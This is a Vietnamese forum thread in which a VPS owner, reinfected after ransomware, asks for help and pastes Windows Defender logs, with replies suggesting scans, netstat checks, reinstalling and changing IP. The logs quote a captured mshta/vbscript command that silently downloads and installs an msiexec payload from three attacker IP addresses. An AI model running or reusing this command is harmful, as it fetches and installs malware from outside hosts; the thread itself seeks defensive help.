VPS cài lại sau khi bị ramsomware, bị dò tấn công

[vitinhcomputer]

Hi mọi người,

Mình có VPS chạy windows server 2016 chạy 2,3 web trang aspx và MS SQL lúc trước bị nhiễm ransomware. Sau đó mình đã cài đặt lại và chạy lại. Nhưng sau đó kiểm tra thấy logs chương trình diệt viruts windows defender cảnh báo rất nhiều Trojan bị quét khi kết nối tới VPS từ nhiều IP nguồn khác nhau và xuất hiện nhiều file lạ và thư mục lạ trong đường dẫn C://ProgramData/
Ngày nào mình kiểm tra cũng thấy có cảnh báo Trojan kết nối tới
Logs Windows Defender
Items:
CmdLine:C:\Windows\System32\cmd.exe /c mshta vbscript:createobject(wscript.shell).run(Cmd /c for /d %i in (103.107.188.190:18065 113.230.237.7:16869 155.138.159.232:17445) do Msiexec /i http://%i/785AD053.moe /Q,0)(window.close)
CmdLine:C:\Windows\System32\mshta.exe vbscript:createobject(wscript.shell).run(Cmd /c for /d %i in (103.107.188.190:18065 113.230.237.7:16869 155.138.159.232:17445) do Msiexec /i http://%i/785AD053.moe /Q,0)(window.close)

VPS này mình chỉ chạy web, đã đổi port RDP, Block các port 445, 139, 138, 137.
mình disable luôn cmd và powershell
Mình không rành về bảo mật nhờ mọi người tư vấn giải pháp giúp
Cảm ơn nhiều!

 

Bạn dùng Window Defender scan full toàn bộ máy diệt nốt những con virus còn ẩn nấp sau đó tiếp tục theo dõi log.

 

Trên server của bạn bị nhiễm virus rồi nhé. Nếu bạn không có kinh nghiệm rà soát virus, điều tra nguyên nhân tấn công, mình khuyên bạn nên cài lại win bạn ạ.

 

Sau khi bị ransomeware, mình đã format cài lại toàn bộ, update windows mới nhất đổi port RDP, Block các port 445, 139, 138, 137. nhưng vẫn bị, check log Window Defender thì ngày nào mình cũng thấy có request tới, mình chặn IP nguồn thì thấy IP nguồn thay đổi liên tục.

 

Nếu bạn ko phiền, có thể cho mình IP để mình thử dò xem.
Thanks.

 

Sau khi bị ransomeware, mình đã format cài lại toàn bộ, update windows mới nhất đổi port RDP, Block các port 445, 139, 138, 137. nhưng vẫn bị, check log Window Defender thì ngày nào mình cũng thấy có request tới, mình chặn IP nguồn thì thấy IP nguồn thay đổi liên tục.

Bạn chạy netstat -a thử xem. Xong đăng kết quả lên mọi người xem nhé

 

Bạn chạy netstat -a thử xem. Xong đăng kết quả lên mọi người xem nhé

Mình check netstat - a

Proto Local Address Foreign Address State
TCP 127.0.0.1:50645 mewebmail:50646 ESTABLISHED
TCP 127.0.0.1:50646 mewebmail:50645 ESTABLISHED
TCP 210.2.x.x:53 HOST-PC:0 LISTENING
TCP 210.2.x.x:80 crawl-66-249-64-37:42493 ESTABLISHED
TCP 210.2.x.x:139 HOST-PC:0 LISTENING
TCP 210.2.x.x:1209 static:35902 ESTABLISHED
TCP 210.2.x.x:1433 HOST-PC:50577 ESTABLISHED
TCP 210.2.x.x:1433 HOST-PC:63937 ESTABLISHED
TCP 210.2.x.x:1433 HOST-PC:63940 ESTABLISHED
TCP 210.2.x.x:49690 40.90.189.152:https ESTABLISHED
TCP 210.2.x.x:50577 HOST-PC:ms-sql-s ESTABLISHED
TCP 210.2.x.x:50578 ip15:3341 ESTABLISHED
TCP 210.2.x.x:50649 172.65.32.248:https ESTABLISHED
TCP 210.2.x.x:55404 94.103.35.18:3333 ESTABLISHED
TCP 210.2.x.x:63937 HOST-PC:ms-sql-s ESTABLISHED
TCP 210.2.x.x:63940 HOST-PC:ms-sql-s ESTABLISHED
TCP 210.2.x.x:63951 20.190.140.100:https SYN_SENT
TCP [::1]:8306 HOST-PC:62415 ESTABLISHED
TCP [::1]:62415 HOST-PC:8306 ESTABLISHED
TCP [fe80::19af:bf3d:c7c3:3000%6]:53 HOST-PC:0 LISTENING
UDP 0.0.0.0:123 *:*
UDP 0.0.0.0:500 *:*
UDP 0.0.0.0:1209 *:*

 

Bạn chạy thêm netstat -b nữa. Nó sẽ hiện lên tất cả phần mềm đang kết nối.
Nếu thấy thằng nào lạ thì post lên cho ae check.

 

Bạn đổi IP khác đi, khả năng IP con VPS của bạn nằm trong list scan của botnet nào đó rồi.